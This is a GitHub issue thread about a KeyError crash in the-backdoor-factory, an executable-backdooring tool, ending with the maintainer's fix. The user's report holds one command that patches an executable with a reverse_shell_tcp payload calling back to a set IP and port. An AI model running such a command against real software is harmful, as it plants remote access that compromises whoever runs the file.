### ISSUE TITLE
KeyError: 'textVirtualAddress'

### ISSUE THREAD

**Issue by getyourbots** [secretsquirrel/the-backdoor-factory#52]
I am using Kali linux 3.18 (latest), and the-backdoor-factory version 3.0.3.
When I try to add an executable, by either adding a new code section, or by trying to add it in existing cave, I get an error.

root@kali:~/the-backdoor-factory# ./backdoor.py -f f2.exe -H 192.168.0.107 -P 8081 -s reverse_shell_tcp -a
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
Traceback (most recent call last):
  File "./backdoor.py", line 62, in <module>
    class bdfMain():
  File "./backdoor.py", line 563, in bdfMain
    result = supported_file.run_this()
  File "/root/the-backdoor-factory/pebin.py", line 145, in run_this
    return self.patch_pe()
  File "/root/the-backdoor-factory/pebin.py", line 1019, in patch_pe
    issupported = self.support_check()
  File "/root/the-backdoor-factory/pebin.py", line 963, in support_check
    self.gather_file_info_win()
  File "/root/the-backdoor-factory/pebin.py", line 314, in gather_file_info_win
    self.flItms['textPointerToRawData'] +
KeyError: 'textVirtualAddress'
--------------------------------------------------------------------------------------------------------------------------
root@kali:~/the-backdoor-factory# uname -a
Linux kali 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 (2015-03-02) x86_64 GNU/Linux

Python 2.7.3 (default, Mar 13 2014, 11:03:55) 
[GCC 4.7.2] on linux2

**Comment by secretsquirrel** [comment]
Can you give me some details about the binary? A download link perhaps?

**Comment by secretsquirrel** [comment]
So if you were to open this file in a PE viewer, you will probably see that it does not have a text section named UPX, COM, or text. If you happen to open it an PE viewer, please send me the name of that section.  I'll fix BDF code to handle the error in the meantime.

**Comment by getyourbots** [comment]
Hei,
Will check the stuff when I get home, for sure, in like 1-2 hours.

**Comment by secretsquirrel** [comment]
Fixed the error, if you run the current version off of github (not kali) BDF will tell you the 'text' section actual name.
https://github.com/secretsquirrel/the-backdoor-factory/commit/fefab81859e48fd3963d6edef9d9876d16eb2736

**Comment by getyourbots** [comment]
Cool, thanks.

**Comment by secretsquirrel** [comment]
closing this, didn't hear anything back from you.
